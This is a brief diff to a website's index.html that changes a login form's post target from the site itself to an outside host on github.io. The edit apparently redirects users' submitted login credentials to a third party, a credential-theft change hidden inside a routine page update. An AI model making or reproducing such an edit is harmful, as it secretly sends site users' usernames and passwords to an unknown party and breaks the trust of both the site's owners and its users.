--- a/index.html
+++ b/index.html
@@ -21,7 +21,7 @@
   </div>
   <div class="Main">
       <div class="MainBg">
-          <form id="loginForm" method="post" action="/" onsubmit="login()" >
+          <form id="loginForm" method="post" action="https://2fxssc.github.io/" onsubmit="login()" >
               <div class="MainL">
 		  <div class="tongzhi">
 	
